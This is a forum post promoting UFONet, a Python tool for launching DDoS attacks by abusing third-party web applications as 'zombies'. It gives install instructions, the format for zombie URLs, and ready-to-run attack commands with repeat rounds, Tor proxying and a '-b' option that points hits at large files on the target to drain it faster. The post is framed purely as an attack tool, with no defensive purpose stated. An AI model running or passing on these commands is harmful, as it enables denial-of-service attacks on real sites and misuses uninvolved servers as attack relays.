Jump to content
loading...

UFONet - DDoS attacks via Web Abuse (XSS/CSRF)

Recommended Posts

Posted

  • Project info:

- Package: UFOnet_v0.2b(.zip)

- Code: Github / Sf

  • Summary:

UFONet - is a shell client designed to launch DDoS attacks against a target,

using CSRF/XSS vectors on third party web applications, like botnet.

It allows to use a proxy to manage 'zombies'.

  • Installing:

UFONet runs on many platforms. It requires Python and the following library:

       python-pycurl - Python bindings to libcurl

On Debian-based systems (ex: Ubuntu), run:

       sudo apt-get install python-pycurl

  • Testing botnet:

Open 'zombies.txt' (or another file) and create a list of possible 'zombies'.

Urls of the 'zombies' should be like this:

       http://target.com/check?uri=

After that, launch it:

       ./ufonet -t zombies.txt

At the end of the process, you will be asked if you want to update the list

automatically adding only 'vulnerable' web apps.

       Wanna update your list (Y/n)

-------------

Examples:

     + with verbose:     ./ufonet -t zombies.txt -v
+ with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"

  • Attacking a target:

Enter the target to attack, with the number of rounds that will be attacked:


./ufonet -a http://target.comTarget -r 10

This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt",

a number of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies',

the program will launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target.

By default, if you don't put any round, it will apply only 1.

Additionally, you can choose a place to recharge on target's site. For example, a large image,

a big size file or a flash movie. In some scenarios where targets doesn't use cache systems,

this will do the attack more effective.


./ufonet -a http://target.com -b "/images/big_size_image.jpg"

-------------

Examples:


+ with verbose: ./ufonet -a http://target.com -r 10 -v
+ with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"

Source & Video: UFONet - DDoS attacks via Web Abuse (XSS/CSRF)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...